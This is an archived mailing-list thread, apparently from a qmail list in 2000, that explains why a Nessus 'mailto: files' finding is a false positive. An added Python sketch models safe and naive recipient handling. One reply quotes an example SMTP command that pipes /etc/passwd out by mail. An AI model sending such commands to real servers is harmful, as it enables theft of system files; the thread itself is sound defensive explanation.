Re: security hole?

2000-06-02 Thread Bob Waskosky

I think the example line in your reply triggered a virus alert.
I received an email stating the reply I sent possibly contained a password stealing 
virus. I hope that was just triggered by your example. I don't believe I have any 
viruses on this machine.

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/

Re: security hole?

2000-06-02 Thread Russell Nelson

Bob Waskosky writes:
 > > rcpt to: | programname
 > Is this a hole and how would I plug it?

It's not a hole.  It's someone trying to send mail to the email
address "| programname".  The vertical bar is odd, yes.  The space is
even more unusual, yes.  But a security hole?  No.  It would be if
qmail were to interpret the | specially, as certain versions of other
MTAs have in the past.  But qmail is neither that naive nor trusting.

-- 
-russ nelson <[EMAIL PROTECTED]>  http://russnelson.com
Crynwr sells support for free software  | PGPok | "Ask not what your country
521 Pleasant Valley Rd. | +1 315 268 1925 voice | can force other people to
Potsdam, NY 13676-3213  | +1 315 268 9201 FAX   | do for you..."  -Perry M.



Re: security hole?

2000-06-02 Thread Bob Waskosky

On Sat, Jun 03, 2000 at 04:29:07AM +, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote:
> > Is this a hole and how would I plug it?
> 
> 
> No it's not a hole.  It would only be a security concern if your mailer
> were to allow the message to actually be piped directly to the program
> specified in the "rcpt to" command.
> 
> Say for example I were to send this command:
> 
> rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd"
> 
> or something similar.  And your MTA happily piped my message to that
> program, which also took /etc/passwd as input and mailed it to me at
> [EMAIL PROTECTED]  _That_ would be a problem.
> 
> With qmail however, pipe symbols are not treated specially and don't
> have the same meaning as they would in a shell.  They are handled as
> though they are part of a username, and since you don't have a local
> user "|mail" the message is treated as any normal message to an unknown
> user.
> 
> You don't need to change anything.  :)  Nessus assumes that because your
> mailer "accepted" the message, it will also deliver it in an "evil"
> way... which qmail won't do.
> 
kewl. Thanks for the info.

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/

Re: security hole?

2000-06-02 Thread Bob Waskosky

On Sat, Jun 03, 2000 at 04:09:21AM +, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 10:58:51PM -0500, Bob Waskosky wrote:
> > Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false
> > positive because I'm scanning myself? Any ideas how to fix this?
> 
> 
> I believe Nessus (correct me if I'm wrong) is trying to send a mail
> message to a program like this:
> 
> rcpt to: | programname
> 
> in which case qmail doesn't handle it specially, it is probably getting
> picked up by your .qmail-default in ~alias (or getting bounced, if you
> don't have one).
> 
Is this a hole and how would I plug it?
Thanks

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
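
An added example, not part of any message in this thread and not qmail's code: a simplified Python model of the two recipient-handling behaviours the replies contrast, showing why an accepted "rcpt to" does not imply program delivery. The function names, the user set and the `example.test` address are assumptions made for illustration; nothing is executed in either model.

```python
# Simplified model (an assumption-laden sketch, not qmail source code).

def split_rcpt(command):
    """Extract the raw address from an SMTP 'RCPT TO:' line without any shell-style parsing."""
    verb, sep, addr = command.partition(":")
    if not sep or verb.strip().lower() != "rcpt to":
        raise ValueError("not a RCPT TO command")
    return addr.strip().strip("<>")

def literal_resolve(addr, local_users, alias_default):
    """Behaviour described in the replies: the address is only a name to look up.
    Unknown names fall through to ~alias/.qmail-default if present, else bounce."""
    local = addr.rsplit("@", 1)[0]
    if local in local_users:
        return ("deliver", local)
    if alias_default:
        return ("alias-default", local)
    return ("bounce", local)

def naive_resolve(addr, local_users):
    """Unsafe behaviour the scanner is testing for: a leading '|' selects
    program delivery. Only the decision is returned; no program is run."""
    stripped = addr.lstrip()
    if stripped.startswith("|"):
        return ("pipe-to-program", stripped[1:].strip())
    local = stripped.rsplit("@", 1)[0]
    return ("deliver", local) if local in local_users else ("bounce", local)

def finding_is_false_positive(decision):
    """The scanner report is only real if the MTA chose program delivery."""
    return decision[0] != "pipe-to-program"

if __name__ == "__main__":
    users = {"bob"}  # constructed sample user list
    probe = split_rcpt("rcpt to: | programname")  # the line quoted in the thread
    for name, decision in [
        ("literal, with .qmail-default", literal_resolve(probe, users, True)),
        ("literal, no .qmail-default", literal_resolve(probe, users, False)),
        ("naive", naive_resolve(probe, users)),
    ]:
        print(f"{name:30} {decision} false_positive={finding_is_false_positive(decision)}")
```
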

security hole?

2000-06-02 Thread Bob Waskosky

Hi
I scanned myself online using nessus/nmap (scanning my dynamic IP) and received an 
email from nessus stating:

Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false 
positive because I'm scanning myself? Any ideas how to fix this?
Thanks in advance
Bob

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/